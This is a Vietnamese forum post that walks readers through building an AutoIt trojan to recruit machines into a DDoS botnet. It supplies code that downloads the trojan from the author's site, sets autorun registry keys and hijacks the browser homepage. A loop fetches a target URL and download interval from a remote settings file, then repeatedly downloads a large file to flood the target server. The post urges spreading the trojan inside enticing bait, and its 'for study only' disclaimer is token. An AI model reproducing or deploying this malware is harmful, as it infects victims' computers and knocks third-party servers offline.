DDOS : Distribute Denial Of Service : Tấn công từ chối dịch vụ phân tán , sử dụng hệ thống mạng botnet để tấn công .
Botnet : Hệ thống các máy tính zombie bị lây nhiễm các trojan , khi nhận lệnh của ta sẽ đồng loạt tấn công .
Sau đây là 1 cách DDOS thông qua HTTP Get , không ghê gớm lắm nhưng cũng làm đc khối tên ói máu nếu mạng botnet của bạn lớn
* Download và Cài AutoIT
* Tạo file script sau
* Compile thành file exe
* Tạo 1 website của bạn , upload file exe lên với tên trojan.txt
* Nhúng trojan này vào 1 cái gì đó hấp dẫn và quăng toán loạn
CODE
$website = "http://yourdomain/"
; Lay Nhiem Vao He Thong
If Not FileExists(@WindowsDir & "\sysinet.exe") Then
InetGet ($website & "/trojan.txt", @WindowsDir & "\sysinet.exe", 0, 1)
Sleep(5000)
EndIf
; Lay Nhiem Vao He Thong
If Not FileExists(@WindowsDir & "\sysinet.exe") Then
InetGet ($website & "/trojan.txt", @WindowsDir & "\sysinet.exe", 0, 1)
Sleep(5000)
EndIf
Đoạn mã trên để download trojan về máy nạn nhân , và rename lại thành file .exe để có khả năng thực thi.
QUOTE
; Ghi Khoa Registry
RegWrite("HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel", "Homepage", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "0")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD", "0")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main", "Start Page", "REG_SZ", $website)
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "Task Manager", "REG_SZ", @WindowsDir & "\sysinet.exe")
RegWrite("HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel", "Homepage", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "0")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD", "0")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main", "Start Page", "REG_SZ", $website)
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "Task Manager", "REG_SZ", @WindowsDir & "\sysinet.exe")
Đoạn trên tạo các giá trị tự động chạy cho trojan sysinet.exe . Disable taskmanager và regedit của đối tượng
Ở đây mình set là 0 vì làm phiền đối tượng nó cáu cài lại máy thì phiền (IMG:http://nhatnghe.com/forum/images/smilies/biggg/_biggrin.gif) . Mình chỉ mượn tay nó đánh phụ thoy , nên tử tế chút (IMG:http://nhatnghe.com/forum/images/smilies/biggg/ROFL.gif)
CODE
InetGet ($website & "/setting.txt", @WindowsDir & "\setting.txt", 0, 1)
Sleep(5000)
$taptinmoi = FileOpen(@WindowsDir & "\setting.txt", 0)
$sitetancong = FileReadLine($taptinmoi)
$thoigian = FileReadLine($taptinmoi)
FileClose($taptinmoi)
while(1)
InetGet ($sitetancong, @windowsDir , 0, 1)
sleep($thoigian)
wend
Sleep(5000)
$taptinmoi = FileOpen(@WindowsDir & "\setting.txt", 0)
$sitetancong = FileReadLine($taptinmoi)
$thoigian = FileReadLine($taptinmoi)
FileClose($taptinmoi)
while(1)
InetGet ($sitetancong, @windowsDir , 0, 1)
sleep($thoigian)
wend
Đoạn này sẽ đọc file settings trên web site của bạn và bắt đầu download dữ liệu từ server về
file setting.txt đặt trên http://yourdomain/
và có nội dụng như sau
dòng 1 : link direct tới file cần download
dòng 2 : thời gian ngủ mỗi lần download
-----------------------------------------------------------------------
ví dụ :
http://abc.com/test.wmv << link direct . file size= 300 mb
300000 << vì file bự , cho ngủ 5 phút .
-----------------------------------------------------------------------
Chỉ cần khoảng vài trăm mạng cùng down bộ phim này thì cái server sẽ ra sao nhỉ (IMG:http://nhatnghe.com/forum/images/smilies/biggg/bomb.gif)
Lưu ý: Tuyệt đối không dùng vào mục đích xấu chỉ dùng để học tập mà thôi nhé !
Link: http://www.angiangonline.net/diendan/index.php?showtopic=1120
